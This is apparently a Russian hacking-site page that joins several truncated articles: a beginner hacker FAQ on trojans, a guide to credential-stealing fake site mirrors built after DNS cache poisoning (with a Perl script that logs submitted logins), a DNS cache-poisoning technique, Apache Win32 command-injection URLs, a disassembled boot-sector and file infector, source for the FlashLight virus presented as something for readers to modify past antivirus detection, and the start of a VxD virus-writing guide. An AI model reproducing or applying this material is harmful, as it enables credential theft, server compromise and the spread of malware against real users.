FAQ Часто задаваемые вопросы начинающих хакеров

В Данном Фак (Freqency asked questions - часто задаваемые вопросы) собраны ответы на любимые вопросы начинающих хакеров столкнувшихся с проблемой безопасности, и пользователей, заинтересовавшихся безопасностью и преодолением защиты.

1. Где можно скачать крякер инета?
Да на каждом углу, например
http://www.yandex.ru/yandsearch?text=крякер+интернет.
Когда ты им воспользуешься, кто-то скажет тебе спасибо за бесплатный интернет, а ты получишь много счетов, если платишь за инет.

2. Что такое троян?
Троян - это то что ты не когда не полюбиш если его впарили тебе, это программа, которая в фоновом режиме производит некоторую деятельность, результаты которой вряд ли понравятся юзеру. Например, похищение его паролей, управление файловой системой или банальное открывание CD-ROM'а. Классический пример распространения трояна - крякер инета. Трояны делятся на похищающие пароли и дающие полный контроль над системой (backdoor).

3. Каков принцип работы систем удаленного администрирования (backdoor)?
Большинство троянов состоят из клиента и сервера, иногда клиентом может
служить любой телнет клиент. Сервер должен работать на машине жертвы, он как
правило, открывает на зараженной машине порт и ждет подключения хакера. Тот, с
помощью клиента подключается к открытому трояном порту и подает серверной части команды, которая их исполняет: передает файлы, открывает CD-Rom, выключает компьтер...

4. Что такое порт?
Порт - это идентификатор определённого сервиса, которым пользуются программы соответствующего назначения. Например, 80 по умолчанию - http, 21 - ftp. Это нематериальная вещь, просто идентификатор, пакеты с которым будут передаваться процессу, 'слушающему' этот порт.

5. Когда я в инете у меня вдруг начинает открывается CD-ROM, запускаются приложения, флоппик пытается музицировать, появляются странные сообщения. В чем дело? Видимо некто, возомнивший себя кул хакером, а может просто твой приятель, подсунул тебе трояна. Давно тебе по почте приходили бесплатные картинки с порносайтов или предложения заработать 1000$ ничего не делая с прикрепленными файлами? А может, ты скачал крякер инета или другую супер пупер мегакульную прогу? Ты, конечно, больше не будешь их открывать? Тогда приступаем к лечению(уничтожению =)).

В Windows есть такая отвратительная (потому что сложная для новичков) или рулезная (по той же причине :)) штука, как РЕЕСТР. Ты про него уже по-любому слышал. Реестр состоит из РАЗДЕЛОВ и СТРОК (все строчки с текстовой информацией разбиты по своим разделам). Строка типа "HKEY_LOCAL_MACHINE\

SOFTWARE\Microsoft\Windows\CurrentVersion\Run" - типичное название раздела реестра. В этом разделе содержится часть программ, которые автоматически запускаются при старте твоего Маздая. Есть еще папка "Пуск-Программы-Автозапуск" и файл autoexec.bat (config.sys), но, скорее всего, там ты никаких ЛЕВЫХ программ (в дальнейшем ТРОЯНОВ) не обнаружишь, так как туда записываются только особо изощренные Трояны, коих, по крайней мере, я еще не обнаруживал :). Для просмотра папки АВТОЗАГРУЗКА достаточно нажать кнопку ПУСК и зайти в ПРОГРАММЫ, для просмотра файлов config.sys и autoexec.bat достаточно запустить notepad. А вот для просмотра РЕЕСТРА нужна программа c:\windows\RegEdit.exe, которая может показывать эти разделы и строчки.
Как я уже сказал, большинство Троянов записывает себя в HKEY_LOCAL_MACHINE\

SOFTWARE\Microsoft\Windows\CurrentVersion\Run, но, помимо этого, существует еще масса мест в реестре, куда следовало бы заглянуть. Например: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\

CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\

CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\

CurrentVersion\Runservices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\

CurrentVersion\RunservicesOnce
HKEY_USERS\.Default\SOFTWARE\Microsoft\Windows\

CurrentVersion\Run
HKEY_USERS\.Default\SOFTWARE\Microsoft\Windows\

CurrentVersion\RunOnce
HKEY_USERS\.Default\SOFTWARE\Microsoft\Windows\

CurrentVersion\Runservices
HKEY_USERS\.Default\SOFTWARE\Microsoft\Windows\

CurrentVersion\RunservicesOnce
Для того чтобы не метаться в диких муках по всему вышеперечисленному вручную, достаточно запустить regedit /e tmp1.txt ИМЯ РАЗДЕЛА, в результате чего после каждого запуска заново будет создан файл tmp1.txt с содержимым
раздела реестра... Посмотрев туда, нужно удалить все "Строковые параметры", запускающие неизвестные программы из соответствующего раздела реестра! Например, довольно популярный Троян "Naebi Soseda" записывает себя как с:\windows\mswinrun.exe, c:\windows\temp\mswinrun.exe.
Другой Троян - GF - записывает себя как c:\windows\windll.exe, c:\windows\system\windll.exe. Разберем Троян Stealth наших друганов - KurT'a и Doc'a. Вот что они сами говорят про него: "Как и большинство подобных программ, наша после первого запуска копирует себя в директорию, где живут Винды, под каким-нибудь Читать далее...

Зазеркалье


название: Зазеркалье
автор: Free_Hunt
e-mail: for_fantom@mail.ru
дата: 25.05.2002




Все знают что-такое зеркала. Нет, не те зеркала, в которых вы видите вечно не выспавшуюся, немного под хмельком рожу ;))) - Зеркала сайтов.Т.е.есть полная копия сайта, для облегчения доступа и снижения нагрузки на основную машину. Но мы приспособим эту идею под свои нужды, пойдем дальше таких зеркал, то есть в Зазеркалье =). Это те же зеркала, тока немного искривленные (модифицированные). Итак, рассмотрим что это такое и зачем оно нужно. Я рассмотрю несколько случаев, так сказать интересных, когда могут понадобиться эти кривые зеркала. Вариант первый. Вы успешно атаковали DNS кэш какого-либо сервера. И вместо всеми любимого mail.ru пользователям выдают наш левый ип адрес. Далее, чтоб не растраивать посетителей, мы делаем на нем полное зеркало mail.ru, за небольшим исключением. В форме отвественной за проверку аккаунта подменяем form action на путь к нашему скрипту, задача которого сводиться к следующему, принять аккаунт, сделать http запрос по реальному IP адресу сервера, на проверку полученного аккаунта. И в зависимости от ответа записать его в текстовой файл, далее выдать получнный ответ, с подправленными ссылками. Вида : http://mailbox.mail.ru/mail.cgi меняем на http://mail.ru/cgi-bin/mirror.pl?redir=http://mailbox.mail.ru/mail.cgi Что делает mirror.pl, я думаю, понятно. Просто соединяеться с реальным сервером передает все что надо (cookies,form_field etc.) и возвращает ответ от реального сервера стакими же подправленымина себя линками. В итоге, после экспериментов и настройкой скриптов мы имеем полное зеркало сайта, немного правда искревленное нужной нам функцией =).Для особо ленивых могу посоветовать ежечасный сброс собранных аккаунтов на мыло или на популярный IRC канал =). Единственное добавлю, что настройку и отладку такого вот кривого зеркала, необходимо делать до подмены данных в DNS кэше,иначе громкие вопли юзверев в суппорт в процессе подготовки зеркала сведут все результаты на нет =).

Вариант второй. Многие, захватив сервер, и не найдя с первого взгляда вкусных баз\инфы , забивают на него , при этом очень часто , забывают поглядеть в /var/named или c:\winnt\system32\dns , так как в случае, если эта машина отве- тственна за какую-либо DNS зону, то намного целесообразнее найти в ней что-нибудь вкусное, типа radius.our.zone or billing.our.zone :) , и просто изменить IP адрес этого имени. Не забывая дать named-у сигнал перечитать конфигурационный файл (не забывайте о записи serial, чтоб инфа о новом ИП дошлаидо вторичного ДНС сервера тоже ;) ). Или в случае вин32, после изменения текстовых файлов обычного юниксового формата, перезапустить сервис. Рекомендации по строительству кривого зеркала абсолютно такие-же как и в первом случае.

Вариант третий (самый распространенный). Часто случаеться так, что получив контроль над машиной, понимаеш, что смотрел задницей, и прозевал что форма передает данные не на эту машину а на другую. Или получить доступ на главный WWW сервер оказалось делом плевым, а вот получить доступ к серверу, куда отправляються данные для авторизации, в короткие сроки не реально. В этой ситуации, наиболее простым решением, являеться изменение поля action, в форме, которая отправляет нужные данные, на путь к своему скрипту(на этом же, или другом сер- вере). Который будет опрашивать реальный, и возвращать результат, или перена- правлять на реальный, в зависимости от конкретного случая, есственно с сохра- неним проходящей информации =). Также, тут можно включить фантазию, и добавить пару полей в форму, или повесить сочный баннер призывающий, якобы "попатчить" новую ошибку в системе, контроль над которой, мы хотим получить =))). Ниже, идут примеры скриптов, но мне лень делать что-либо общее и универсаль- ное, так как писать скрипты, особенно на перле, должен уметь каждый програмер, а вы уж и подавно =). Потому что, сегодня без автоматизции, жить трудно =). --------------------------------------------- #!perl use Socket; use CGI param; $text1=param("text1"); $text2=param("text2"); $text3=param("text3"); $remote="xxx.xxx.xx.x";$port="80"; if ($port =~ /\D/) { $port = getservbyname($port, 'tcp') }; $iaddr = inet_aton($remote); $paddr = sockaddr_in($port, $iaddr); $proto = getprotobyname('tcp'); socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "socket()"; connect(SOCK, $paddr); $data="text1=$text1&text2=$text2&text3=$text3"; send SOCK,"POST /mail HTTP/1.1\n",0; send SOCK,"Content-Length: ".length($data)."\n",0; send SOCK,"Content-Type: application/x-www-form-urlencoded\n",0; send SOCK,"Connection: Keep-Alive\n\n",0; send SOCK,$data,0; while(){$ret="$ret"."$_";} open (FILE2 ,">>_log.txt") || die "open() log $! $@"; print FILE2 "---=$remote:$port=---\n$ret\n$data\n\n"; close FILE2; close(SOCK); ----------------------------------------------- #!perl use CGI param; $login=param("login");$pass=param("pass"); print "Location: Читать далее...

Aтака на DNS

Общеизвестное недосказанное или атака на DNS кэш by Free_Hunt.

Все кто интересуется темой безопасности в сети, и в частности DNS протоко- лом, давно знают о существовании атаки на DNS кэш . Эта тема широко описыва- лась в РУнете (статья на Хакзоне,книги "Атака на\через Интернет"). Суть ата- ки ,как всем известно , заключается в спуфинге (подделке) ответа от DNS сер- вера ,что приводило к неправильному разрешению (resolving) имени , т.е. воз- можности изменения соответствия ИМЯ - IP адрес. Однако в этих статьях расматривались только внутрисегментные атаки (хакер и жертва в одном сегменте сети),что позволяло прослушать трафик жертвы и вы- тащить из DNS пакета ID поле или номер порта в случае атаки на пользователя. Для атак на просторах интернета предлагалось "угадать" DNS ID перебором всех вариантов :) , что не реально, так как требует посылки около 6 мегабайт ин- формации в миллисекунды. Итак , как можно узнать значение DNS ID не слушая трафик жертвы? Известно две возожности.Первая - требует наличия подконтрольного primary DNS сервера. В этом случае для внесения неверных данных в DNS кэш сервера жертвы, необхо- димо узнать его текущее значение ID, которое увеличивается на единицу с каж- дым новым запросом. Для осуществления этого посылаем запрос к серверу жертве на разрешение имени любой машины из DNS зоны за которую отвечет наш подконт- рольный сервер.В следствии этого если в DNS кэше жетвы нет информации о дан- ном имени произойдет процедура удаленого поиска в DNS(запрос корневых серве- ров, и далее по нисходящей до авторитетного) , которая в конце концов приве- дет к запросу от жертвы на наш подконтрольный DNS сервер о машине из его DNS зоны(это обязательно произойдет,т.к. только он будет авторитетным для данной зоны) , причем в запросе будет содержаться значение ID сервера жертвы, а так как наш сервер под контролем мы можем прослушать его трафик и выловить это значение. Таким образом мы будем знать , что в такую-то секунду у DNS сервера жертвы было такое-то зачение ID . Но за время запроса-ответа это значение могло из- мениться , если кто-то в это время еще запрашивал разрешение имени которого нет в кэше. Как узнать на сколько оно изменилось ? Правильно, статистика :) , идем почти как по Митнику,только намного проще. Запрашиваем разрешение имени любой другой машины из зоны нашего подконтроль- ного сервера, опять получаем значение ID, но теперь уже засекаем время между ответом на первый запрос и на второй .

Повторяем эту процедуру несколько раз (чем больше тем лучше :) ), в итоге получим некоторое среднее значение изме- нения ID счетчика в некотором интервале времени,например в секунду(если зна- чение изменяется сильно то лучше взять меньший интервал).Таким образом, мы с некоторой вероятностью можем предсказать значения счетчика в ближайшее время. Выбераем время , расчитыаем значение ID , которое должно быть в эту секунду, берем 10 или 100 значений в зависимости от быстроты изменения. И посыла- ем запрос об имени чей IP мы хотим изменить,вместе с нашими ответами,в кото- рых подставлен левый IP адрес на запрашиваемое имя , и если все подсчитано верно и статистика не подведет в кэше DNS сервера жертвы окажеться соответс- твие имя - наш левый IP =) . Проверить это просто,посылаем обычый запрос о разрешении имени,если в от- вете будет наш IP, то все получилось иначе повторяем все сначала =). Схема атаки на DNS кэш. ................ . КОРНЕВЫЕ С-РА. .............. .......? ....... . Сервера . / . зоны РУ . / /........................... ID=6 / / где искать"ru"? / / ID=6 / / а где"our.ru" ? ________ port / / port ________ | | 53 какой IP у "vasya.our.ru"? 1025 | | | DNS | <--------------------------------- | "НАШ" | | ЖЕРТВА | / / | DNS | | |../ / |(our.ru)| | ID=6 | ..../ | | | | 53 ID=6 кто "vasya.our.ru" ? 53 | в зоне | | ....| --------------------------------> | vasya | | . | 53 "vasya.our.ru" - x.x.x.1 53 | katya | | . | <----------------------------- | ...итд | | . | 53 "vasya.our.ru" - x.x.x.1 1025 | | | . | ----------------------------> | | | . | .......... . . . . | | | . | ID=7 . INET . | | | 1сек | . . | | | . | ........... . . .. | | | . | ID=8 | | | . | | | | . | 53 какой ip у "katya.our.ru"? 1026 | | | . | <------------------------------ | | | . | 53 ID=9 кто "katya.our.ru" ? 53 | | | ....| ------------------------------> | | | | 53 "katya.our.ru" x.x.x.2 53 | | | | <----------------------------- | | | | 53 "katya.our.ru" - x.x.x.2 1026 | | | | ----------------------------> | | | | | | | | | | |________| ... и т.д. |________| Строим табличку по результатам. Далее... | изм-е t | изм-е ID Находим усреднение изм-я ID=4 1c | 1сек | 9-6=3 Последний ID=25 2c | 1сек | 13-9=4 В 6-ую секунду значение 4c | 2сек | 21-13=8 ID должно быть равно 25+4=29 5c | 1сек | 25-21=5 Здесь нужно посчтиать погрешность, .... и т.д. но так как она нам даст далеко не 99% вероятность ркомендую брать (ср. изм-е ID)*2 или даже *3 то есть в итоге посылаем пакеты с ID от 25 до 37 ( 12 Читать далее...

Возможность удалённого выполнения команд в Apache for Windows



Возможность удалённого выполнения команд в Apache for Windows.
В версии Apache for Win32 (тестировались релизы 1.3.23 и 2.0.28-BETA) существует возможность удалённого выполнения команд сервера. Эти дистрибутивы содержат пакетный (batch) файл /cgi-bin/test-cgi.bat и в сервере предусмотрена возможность выполнения .bat и .cmd -скриптов. При запросе DOS batch-файла формируется запрос к Вэб-серверу, в результате которого вызывается командный интерпретатор (cmd.exe по умолчанию). Однако вводимые со скриптом параметры не анализируются программой. Подобная "особенность" позволяет в поле параметров передать символ "|" (конвейер в терминологии UNIX) и выполнить помимо .bat-файла произвольные команды. Например, после выполнения запроса http://TARGET/cgi-bin/test-cgi.bat?|copy+..-

\conf\httpd.conf+..\htdocs\httpd.conf содержимое файла конфигурации Вэб-сервера (httpd.conf) будет доступно любому посетителю Вэб-сайта. Запрос http://TARGET/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..-

\htdocs\index.html поместит слово "Foobar" на входную страницу Вэб-сервера. Запрос http://TARGET/cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt выведет в файл dir.txt полное содержимое диска С. Пользователям Apache for Win32 рекомендуют обновить свой Вэб-сервер до версии 1.3.24 или 2.0.34-beta (крайние версии продуктов, но бета пока не выпущена).
Обновлённые версии Apache - http://www.apache.org/dist/httpd/







автор: XS-TEAM
e-mail: info@xakep.far.ru
http://hack-info.tk

Ignorance - MBR, COM, EXE...


Ignorance - MBR, COM, EXE, SYS infector. 1979 bytes.
Не трудно заметить, что это не исходник вируса
и не преднозначен для перекомпиляции.
Не переделывайте чужие вирусы - пишите свои ;-)
Получен этот код так:
В отладчик был загнан зараженный COM файл длиной
2000 байт. После выполнения первого перехода и
расшифровки дамп был скинут в файл. Вот и все...
Все числа - шестнадцатиричные, многие смещения
берутся в памяти, что вносит путаницу ;-(

P.S. Бля прислали без перевода так что извините за неполные и глючные комментарии...

Сохранить вектор 4Сh и установить
его на CS:8EA.

20ED:08D0 33C0 XOR AX,AX
20ED:08D2 8ED8 MOV DS,AX
20ED:08D4 BE3001 MOV SI,0130
20ED:08D7 FF34 PUSH [SI]
20ED:08D9 FF7402 PUSH [SI+02]
20ED:08DC C704DA08 MOV [SI],08DA
20ED:08E0 8CC8 MOV AX,CS
20ED:08E2 40 INC AX
20ED:08E3 894402 MOV [SI+02],AX


Антиэвристика. Передать управление
по адресу 8EA.


20ED:08E6 CD4C INT 4C

20ED:08E8 CD20 INT 20


Вызвать процедуру расшифровки кода
и восстановления вектора 4Ch.

20ED:08EA E87107 CALL 105E
Расшифрованный код...

20ED:08ED FC CLD
20ED:08EE 81EE8D07 SUB SI,078D
20ED:08F2 55 PUSH BP
20ED:08F3 8CC5 MOV BP,ES ; Сохранить ES
20ED:08F5 704A JO 0941 ; Нас запустили из SYS ?

20ED:08F7 83C402 ADD SP,0002 ; Освободить стек

20ED:08FA E8B806 CALL 0FB5 ; Проверка на себя...
20ED:08FD 7409 JZ 0908 ; Уже инсталлирован!

; Начинаем инсталляцию...

20ED:08FF B83600 MOV AX,0036
20ED:0902 50 PUSH AX
20ED:0903 E91F05 JMP 0E25

20ED:0906 33F6 XOR SI,SI

20ED:0908 8EC5 MOV ES,BP ; Восстановить ES
20ED:090A 0E PUSH CS
20ED:090B 1F POP DS
20ED:090C 81C62307 ADD SI,0723 ; А может это EXE
20ED:0910 7009 JO 091B ; Точно EXE

20ED:0912 BF0001 MOV DI,0100
20ED:0915 55 PUSH BP
20ED:0916 57 PUSH DI
20ED:0917 A5 MOVSW
20ED:0918 A4 MOVSB ; Восстановить первые 3 байта
; COM файла
20ED:0919 EB15 JMP 0930 ; На выход

Восствановить стек
и передать управление
по адресу из заголовка

20ED:091B 83C510 ADD BP,0010
20ED:091E AD LODSW
20ED:091F 03C5 ADD AX,BP
20ED:0921 93 XCHG AX,BX
20ED:0922 AD LODSW
20ED:0923 8ED3 MOV SS,BX
20ED:0925 94 XCHG AX,SP
20ED:0926 AD LODSW
20ED:0927 93 XCHG AX,BX
20ED:0928 AD LODSW
20ED:0929 03C5 ADD AX,BP
20ED:092B 50 PUSH AX
20ED:092C 53 PUSH BX
20ED:092D 83ED10 SUB BP,0010

20ED:0930 33C0 XOR AX,AX
20ED:0932 8BD8 MOV BX,AX
20ED:0934 89C1 MOV CX,AX
20ED:0936 8BD0 MOV DX,AX
20ED:0938 8BF0 MOV SI,AX
20ED:093A 8BF8 MOV DI,AX
20ED:093C 8EDD MOV DS,BP
20ED:093E 89C5 MOV BP,AX
20ED:0940 CB RET Far

20ED:0941 8B842307 MOV AX,[0723+SI]
20ED:0945 2EA30600 MOV CS:[0006],AX
20ED:0949 5D POP BP
20ED:094A 50 PUSH AX
20ED:094B 53 PUSH BX
20ED:094C 51 PUSH CX
20ED:094D 52 PUSH DX
20ED:094E 06 PUSH ES
20ED:094F 33C0 XOR AX,AX
20ED:0951 BA8000 MOV DX,0080
20ED:0954 CD13 INT 13
20ED:0956 7228 JC 0980
20ED:0958 E85A06 CALL 0FB5
20ED:095B 7423 JZ 0980
20ED:095D E81506 CALL 0F75
20ED:0960 33FF XOR DI,DI
20ED:0962 B9BB07 MOV CX,07BB
20ED:0965 F3A4 REP MOVSB
20ED:0967 B89C00 MOV AX,009C
20ED:096A 50 PUSH AX
20ED:096B C3 RET

20ED:096C E87C05 CALL 0EEB
20ED:096F 0E PUSH CS
20ED:0970 1F POP DS
20ED:0971 E84303 CALL 0CB7
20ED:0974 7308 JNC 097E
20ED:0976 B419 MOV AH,19
20ED:0978 CD21 INT 21
20ED:097A 92 XCHG AX,DX
20ED:097B E88C03 CALL 0D0A
20ED:097E EBFE JMP 097E
20ED:0980 07 POP ES
20ED:0981 5A POP DX
20ED:0982 59 POP CX
20ED:0983 5B POP BX
20ED:0984 58 POP AX
20ED:0985 FFE0 JMP AX
20ED:0987 3DCEA7 CMP AX,A7CE
20ED:098A 7519 JNZ 09A5
20ED:098C 93 XCHG AX,BX
20ED:098D 0E PUSH CS
20ED:098E 07 POP ES
20ED:098F CF IRET

20ED:0990 Db 'Ignorance is Strength'

20ED:09A5 50 PUSH AX
20ED:09A6 D0EC SHR AH,1
20ED:09A8 80FC01 CMP AH,01
20ED:09AB 753E JNZ 09EB
20ED:09AD 80FA80 CMP DL,80
20ED:09B0 723F JC 09F1
20ED:09B2 7737 JA 09EB
20ED:09B4 0AF6 OR DH,DH
20ED:09B6 7533 JNZ 09EB
20ED:09B8 83F901 CMP CX,0001
20ED:09BB 772E JA 09EB
20ED:09BD 58 POP AX
20ED:09BE 3D0903 CMP AX,0309
20ED:09C1 7329 JNC 09EC
20ED:09C3 E88705 CALL 0F4D ; Сохранить регистры...
20ED:09C6 50 PUSH AX
20ED:09C7 B001 MOV AL,01
20ED:09C9 B90900 MOV CX,0009
20ED:09CC E84605 CALL 0F15
20ED:09CF 58 POP AX
20ED:09D0 FEC8 DEC AL
20ED:09D2 740B JZ 09DF
20ED:09D4 81C30002 ADD BX,0200
20ED:09D8 E83A05 CALL 0F15
20ED:09DB 81EB0002 SUB BX,0200
20ED:09DF E87F05 CALL 0F61 ; Восстановление регистров...
20ED:09E2 40 INC AX
20ED:09E3 32E4 XOR AH,AH
20ED:09E5 CA0200 RET Far 0002

20ED:09E8 E87605 CALL 0F61 ; Восстановление регистров...
20ED:09EB 58 POP AX
20ED:09EC 2EFF2EC607 JMP Far CS:[07C6]

20ED:09F1 E85905 CALL 0F4D ; Сохранить регистры...
20ED:09F4 33C0 XOR AX,AX
20ED:09F6 8ED8 MOV DS,AX
20ED:09F8 FEC2 INC DL
20ED:09FA 84163F04 TEST [043F],DL
20ED:09FE 75E8 JNZ 09E8
20ED:0A00 FECA DEC DL
20ED:0A02 E87005 CALL 0F75
20ED:0A05 E80203 CALL 0D0A
20ED:0A08 E85605 CALL 0F61 ; Восстановление регистров...
20ED:0A0B EBDE JMP 09EB

20ED:0A0D Db 'Freedom is Читать далее...

Вирус FlashLight


Вирус FlashLight
Написан в Hех'e

Простой TSR.EXE Infects on 21h/4Bh Определяется Dr.Web'ом, но мы в вас верим что вы его модифицируете
Что он делает:
В понедельник определенного числа (в зависимости от 20) выводит "правду".
ламер! изменение copychit'a сопровождается удалением нервных клеток
из головного мозга...
-----------------------------------------------------------------------

.286
.model small
day=1 ; Понедельник (видно в понедельник их мама родила... :)
time=21840 ; 20 minutes (20*60 sec*18.2)
@version equ 1000h

at_green=00001010b ; ярко-зел. на черном
at_yellow=00001110b ; ярко-жел. на черном
at_violet=00001100b ; фиолет. на черном (не помню)

push_all macro ; Макрос:
pusha ; сохраняем все регистры в стеке
push es ; и сегментные
push ds ; тоже
endm
pop_all macro ; Макрос:
pop ds ; восст. сегментные
pop es
popa ; восстановим все регистры из стека
endm

; Макрос: пауза
pause macro
cli ; запретить прерывания
in al,60h ; прочитать тек. состояние клавиатуры
mov cs:[val_],al ; запомнить состояние
@p:
in al,60h ; прочитать сост. клавиатуры
cmp al,cs:[val_] ; изменилось?
jz @p ; значения одинаковые-не изменилось
sti ; разрешить прерывания
endm

code segment para public 'code'
assume cs:code,ds:code,es:code,ss:code
org 0
start:
call vir_main ; определим смещение в файле
vir_main: ; адрес возврата будет лежать в стеке
pop bp ; заберем его из стека
sub bp,3 ; уменьшим на 3 (т.к. команда call vir_main
alt=offset vir_main ; занимает 3 байта)
jmp init ; на установку в память

А это перехваченный инт 8 (таймер). Перехватывается только в
понедельник определенного числа, а в остальное время не работает.
Вызывается инт 8 восемнадцать раз в секунду

Hooked_int8:
pushf ; сохраним флаги в стеке
cmp word ptr cs:[counter],time ; проверим счетчик
jz effect_run ; если совпал, то запускаем эффект
inc word ptr cs:[counter] ; если время не пришло, то увеличиваем
popf ; счетчик.
jmp @back ; на выход
effect_run:
mov cs:[counter],0 ; обнуляем счетчик, чтобы через 20 мин. опять появилась
push_all ; сохраним все регистры
push cs
pop ds ; DS=CS
call eff_pr ; вызываем эффект
pop_all ; восстановим все регистры
popf ; восстановим флаги
@back:
db 0eah ; код команды jmp far
old8 dd 0 ; двойное слово-оригинальный адрес инт 8ого

Здесь идет сам эффект

eff_pr:
; сначала сохраним первые три строки экрана
push ds ; сохр. DS
pop es
push ds ; DS=ES
cld
mov cx,80*2*3 ; 3 строки
mov ax,0b800h ; адрес видеобуфера
mov ds,ax
mov di,offset buf+20h ; сюда будем сохранять
xor si,si ; отсюда будем читать (B800:0000)
rep movsb ; поехали
pop ds ; восстановить DS
mov es,ax ; ES=B800
xor di,di ; задаем позицию вывода
mov si,offset mess ; смещение строки, кот. будем выводить
mov cx,len*2 ; длина строки*2
mov dl,at_green ; атрибут цвета
call out_mess ; процедура вывода строки на экран
; остальные две строки выводяться таким же макаром
mov si,offset mess2
mov cx,len2*2
mov dl,at_yellow
call out_mess

mov si,offset mess3
mov cx,len3*2
mov dl,at_violet
call out_mess

pause ; подождем, пока нажмут на кнопку

; восстанавливаем содержимое экрана
cld
mov cx,80*2*3 ; количество байт
xor di,di ; по смещению 0
mov si,offset buf+20h ; тут он хранится
rep movsb ; понеслась
ret

; si- offset mess
; cx- len
; dl- attribute
out_mess:
movsb
mov byte ptr es:[di],dl
dec cx
inc di
loop out_mess
ret

mess db 'Пишем сюда месагу №1'
len=$-mess
mess2 db 'Пишем сюда месагу №2'
len2=$-mess2
mess3
len3=$-mess3'Пишем сюда месагу №3'
; ну таких месаг пишете скока хотите :)
val_ db 0
counter dw 0 ; счетчик

Перехваченный вектор 21H. Тут мы будем заражать на выполнении (4BH)

Hooked_int21:
pushf
cmp ax,0ddddh ; проверка на инсталяцию
jnz check_run
mov ax,01111h ; в AX идентификатор, что уже мы в памяти
mov si,@version ; в SI сунем версию
popf ; мы уже давно тут :)
iret
check_run:
cmp ax,4B00h ; запуск?
jz process
jmp return_back ; не, не запуск
process:
int 3
push_all
mov si,dx ; при запуске имя лежит в DS:DX
mov ax,word ptr ds:[si+3]
or ax,2020h
cmp ax,'oc' ; COMMAND.COM
jz process_over ; не заражаем
cmp ax,'rd' ; Dr.Web-дерьмо
jz process_over ; не заражаем
cmp ax,'ia'
jz process_over ; не заражаем
call super_open ; откроем файл.
jc process_over ; ошибка-на выход
; ошибок нет, попробуем заразить
push ds
push cs
pop ds
; прочитаем заголовок
mov ah,3fh
mov cx,18h
mov dx,offset buf
int 21h
pop ds
jc process_close ; ошибка-выход
mov di,offset buf ; указывает, куда мы прочитали загаловок
call exe_config ; эта процедура настраивает заголовок
or ax,ax ; AX=0, ели возникла ошибка (файл типа COM)
jz process_close ; закрытие
call write_it ; запись загаловка и тела вируса
jc process_close ; закроем
process_close:
mov ah,3eh ; закроем
int 21h
process_over:
pop_all ; восстановим знач. регистров
return_back:
popf
db 0EAh ; прыгнем на настоящий
int21 dd 0 ; INT 21H

write_it:
push Читать далее...

Руководство по написанию вирусов


Вирусно ориентировачное руководство по написанию VxD


Это руководство дает только первоначальное ознакомление с программированием
VxD. Чтобы полностью получить представление о предмете разговора, вам нужно
нечто большее чем просто этот файл.

Что такое VxD?
--------------

Ну что-ж, начнем с того, что нам в нем интересно... VxD это 32-битный кусок
кода, который выполняется в защищенном режиме с привилегиями Кольца0 (ring0).
Все это сделано потому,что они имеют дело с системными ресурсами (такими как
драйверы железа и инсталлированные прогаммы). Я надеюсь, что с этого момента,
не остается сомнений в том, что именно нам в этом интересно? Написание VxD,
контролирующего программы (конечно-же!). Для достижения этого мы рассмотрим то
место в ОС, где мы можем нанести наибольший ущерб - файловую систему.

С чего начать?
--------------

Перед началом, вы должны заполучить несколько утилит. Эти программы доступны в
Микрософт Девелопмент Нетворк (MSDN) и в нескольких других местах. Они вам
точно понадобятся, если вы интересуетесь написанием VxD.

- Microsoft Macro Assembler (я использую 6.11c).
- Linear-Executable Linker (я использую 1.00.058).
- ADDHDR.EXE и MAPSYM32.EXE из Microsoft SDK

Так как первые вирусы для Win98, написанные как VxD, уже начали бродить
вокруг, я обнаружил что больше количество народа ищет .INC файлы, которые
необходимы для компиляции всего этого дела. Вам будут нужны следующие файлы
из SDK:

- VMM.INC : в этом файле вы найдете макросы и определения сервисов VMM
- DEBUG.INC : только если вам нужна отладка
- SHELL.INC : этот файл определяет сервисы, которые дают доступ ко многим
функциям Windoze, таким как MessageBox.
- IFS.INC и
- IFSMGR.INC: интересны вамЁ только если вы хотите потрахаться с файловой
системой Windows95.

Ссылки на все эти inc-файлы должны стоять в исходнике между директивами .xlist
и .list

Написание VxD
-------------

Написание VxD - будет делом несравнимо легким, если мы возьмем обобщенный
пример, и будем добавлять наш код там, где нам надо. Давайте разобьем нашу
работу на несколько стадий. Так мы сможем инсталлировать и тестировать вирус,
как только закончим работу с очередным куском.

Сперва начнем с обобщенного VxD - который содержит сегмент, VxD и определения
контрольных процессов. Позднее добавим процедуру инициализации в real-mode,
которая (как мы увидим) будет всем известной проверкой на резидентую копию.
Затем добавим инициализацию VxD и перехват обращений к файлам. И, под конец -
допишем все остальные процедуры VxD.

Сегменты VxD
------------

Внутри VxD мы можем найти пять разных типов серментов. Каждый из них имеет
свои собственные характеристики. Для того, чтобы обьявить эти сегменты мы
можем использовать следующий макрос:

- VxD_CODE_SEG и VxD_CODE_ENDS: еще зовется _LTEXT, - кодовый сегмент
защищенного режима. Обьявление этого сегмента обязательно.

- VxD_DATA_SEG и VxD_DATA_ENDS: так же зовется _LDATA, определяет
сегмент данных для глобального использования в VxD. Его так-же
нужно обьявлять.

- VxD_ICODE_SEG и VxD_ICODE_ENDS: еще зовется _ITEXT. Эти два макроса
определяют начало и конец сегмента инициализации в прот-моде. Этот
сегмент необязателен и освобождается, как только инициализация
завершена (после получения сообщения Init_Complete).

- VxD_IDATA_SEG и VxD_IDATA_ENDS: еще зовется _IDATA, здесь мы можем
хранить все необходимые для инициализации данные, которые будут
отброшены как только мы получим сообщение Init_Complete. Использование
этого сегмента необязательно.

- VxD_REAL_INIT_SEG и VxD_REAL_INIT_ENDS: необязательный сегмент, который
имеет так-же имя _RTEXT, содержит процедуру, которую Менеджер Виртуальной
Машины (VMM - Virtual Machine Manager) будет вызывать перед загрузкой
всех остальных частей VxD. Этот сегмент освобождается как только
процедура произведет возврат управления.

Все эти сегменты, за исключением _RTEXT (инициализации в реальном режиме) -
сегменты защищенного режима с flat моделью памяти. Это означаетЁ что все
смещения - 32-битные и нам надо использовать макрос "offset32" везде, где
мы раньше писали "offset". Теперь CS, DS, ES и SS не могут изменяться, но
вместо них мы можем использовать FS и GS.

Обьявление VxD
--------------

Для того, чтобы обьявить наш VxD мы будем юзать следующий макрос:

Declare_Virtual_Device имя, старшая версия, младшая версия, контольная
